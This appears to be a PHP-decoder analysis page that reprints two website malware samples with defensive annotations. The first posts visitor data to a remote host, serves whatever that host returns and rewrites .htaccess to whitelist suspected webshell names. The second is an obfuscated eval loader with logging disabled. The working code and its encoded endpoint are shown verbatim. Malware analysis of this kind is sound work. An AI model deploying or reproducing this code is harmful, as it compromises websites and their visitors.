
PHP Decode

<?php function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url)..

Decoded Output download

# .htaccess content that h2() in the PHP sample on this page base64-decodes and
# writes to disk. It uses the legacy Order/Allow/Deny access-control syntax.

# Section 1: deny HTTP access to every file whose name ends in py, exe or php.
# NOTE(review): the leading "." is an unescaped regex dot, so it matches any
# single character, not only a literal dot before the extension.
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
# Section 2: re-allow a fixed list of PHP file names. Sections are merged in the
# order they appear, so for these names this later "Allow from all" takes effect.
# NOTE(review): index.php and wp-login.php are stock WordPress names; the rest
# (e.g. wp-l0gin.php, lock360.php, mah.php, jp.php, ext.php) look like names to
# hunt for in the web root during triage - confirm against the site's real files.
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php|mah.php|jp.php|ext.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
# Section 3: front-controller rewrite. Any request that does not map to an
# existing file (!-f) or directory (!-d) is routed to /index.php.
# NOTE(review): presumably the injected PHP lives in (or is loaded by) index.php,
# which would make it handle almost every request - verify on the affected host.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>


Original Code

<?php
// ANALYSIS NOTES (code below is unchanged apart from line breaks and comments).
// Summary of what the visible code does:
//   1. h()  - cURL helper used to POST request metadata to a remote host.
//   2. h2() - deletes robots.txt and overwrites .htaccess with an embedded copy.
//   3. Top level - on every request, reports visitor data to $api and serves
//      whatever headers and body that host returns, then stops the script.
// Detection ideas grounded in this file: outbound HTTP with User-Agent "h",
// .htaccess rewritten on each request, robots.txt disappearing, and the
// embedded comment marker kept verbatim further down.

/**
 * Fetch $url with cURL and return the response body.
 *
 * Sends User-Agent "h", waits up to 30 seconds and forces a fresh connection.
 * When $pf is not the empty string the request becomes a POST; the POST body is
 * only set when $pf is an array (URL-encoded via http_build_query).
 *
 * @param string       $url Target URL.
 * @param array|string $pf  POST fields; '' means plain GET.
 * @return string Response body, or '' when curl_exec() returns a falsy value.
 */
function h($url, $pf = '') {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, 'h');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);
    if ($pf != '') {
        curl_setopt($ch, CURLOPT_POST, 1);
        if(is_array($pf)){
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf));
        }
    }
    $r = curl_exec($ch);
    curl_close($ch);
    if ($r) {
        return $r;
    }
    return '';
}

/**
 * Remove robots.txt and force the embedded .htaccess into the current directory.
 *
 * File names are split into concatenated fragments and every filesystem call is
 * prefixed with "@", so failures are silent. The base64 blob decodes to the
 * .htaccess text shown under "Decoded Output" on this page. If the file on disk
 * already equals that text nothing is written; otherwise the file is made
 * world-writable, overwritten, and set back to 0644.
 *
 * @return void
 */
function h2() {
    // Delete robots.txt from the working directory if present.
    if (file_exists('robots'.'.txt')){
        @unlink('robots'.'.txt');
    }
    $htaccess = '.'.'htaccess';
    $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+");
    // Skip the write when the on-disk file already matches, which keeps the
    // file's modification time from changing on every request.
    if (file_exists($htaccess)) {
        $htaccess_content = file_get_contents($htaccess);
        if ($content == $htaccess_content) {
            return;
        }
    }
    // Any administrator edit to .htaccess is reverted here on the next request.
    @chmod($htaccess, 0777);
    @file_put_contents($htaccess, $content);
    @chmod($htaccess, 0644);
}

// Remote endpoint, stored base64-encoded. The page's "Variables" table lists the
// decoded value as hxxp://5488-ch4-v203.umlikeok[.]xyz (defanged here).
$api = base64_decode('aHR0cDovLzU0ODgtY2g0LXYyMDMudW1saWtlb2sueHl6');

// Visitor and request metadata that is sent to $api.
$params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME'];
$params['request_url'] = $_SERVER['REQUEST_URI'];
$params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
// Tests for a Via header but reads X-Forwarded-For, which may be unset; the
// null case is normalised to "" on the next line.
$params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];
if($params['ip'] == null) {$params['ip'] = "";}
$params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://';
$params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '';

// Unauthenticated diagnostic path: any request carrying a "params" parameter
// gets a print_r() dump of the collected values plus the decoded endpoint, and
// the script stops. A response of that shape is a usable infection indicator.
if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();}

// Re-assert the .htaccess on every request (see h2()).
h2();

// Up to three attempts: POST the metadata, then base64-decode and gzuncompress
// the reply and split it on "|". The last element (base64-decoded again) is
// echoed as the response body; every element before it is passed to header()
// unmodified. The remote host therefore fully controls status, redirects and
// page content for requests reaching this script.
// NOTE(review): this pattern is consistent with content cloaking or redirect
// injection - confirm from captured traffic rather than from this file alone.
$try = 0;
while($try < 3) {
    $content = h($api, $params);
    $content = @gzuncompress(base64_decode($content));
    $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/
    if (!empty($data_array)) {
        $data = array_pop($data_array);
        $data = base64_decode($data);
        foreach ($data_array as $header) {
            @header($header);
        }
        echo $data;
        die();
    }
    $try++;
}
?>


<?php
// ANALYSIS NOTES (code below is unchanged apart from line breaks and comments).
// Loader stub: it assembles three function names from string fragments, turns
// off error reporting and logging, then eval()s a payload that is stored
// reversed, ROT13-encoded and base64-encoded.
// The payload is NOT decoded in these notes; what it does cannot be stated from
// this listing. Decode it statically in an isolated analysis environment (apply
// strrev, str_rot13 and base64_decode and print the result) rather than
// letting eval() run it.

// 'strrev', 'str_rot13' and 'base64_decode', split into fragments.
// NOTE(review): presumably split so plain keyword scans do not match - the
// concatenation pattern itself is a useful signature.
$Vfzci = 'str'.'rev';
$dNcSF = 's'.'tr'.'_rot1'.'3';
$CtRIo = 'b'.'as'.'e64'.'_deco'.'de';

// Suppress every trace of runtime errors: no log target, no reporting, no
// logging, no display.
ini_set('error_log', NULL);
error_reporting(0);
ini_set('log_errors', 0);
ini_set('display_errors', 0);

// The 40-hex-character comment below is kept byte-for-byte; it may serve as a
// campaign or build marker (unverified) and can be used as a search string.
/*  4a9946d3a7686949877b32766128e27e0e68915a***/

// Executes base64_decode(str_rot13(strrev(<literal>))) as PHP code.
eval($CtRIo($dNcSF($Vfzci('=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'))));
?>

Function Calls

h2 1
print_r 1
file_exists 1
base64_decode 2

Variables

$api http://5488-ch4-v203.umlikeok.xyz
$params [{'key': 'domain', 'value': ['ArrayOffset', {'expr': 'SERVER_NAME', 'node': ['Variable', {'name': '$_SERVER'}]}]}, {'key': 'request_url', 'value': None}, {'key': 'referer', 'value': ''}, {'key': 'agent', 'value': ''}, {'key': 'ip', 'value': ''}, {'key': 'protocol', 'value': 'http://'}, {'key': 'language', 'value': ''}, {'key': 'api', 'value': 'http://5488-ch4-v203.umlikeok.xyz'}]
$htaccess .htaccess

Stats

MD5 3f318ac66c41c0e388a2405c9e039478
Eval Count 1
Decode Time 322 ms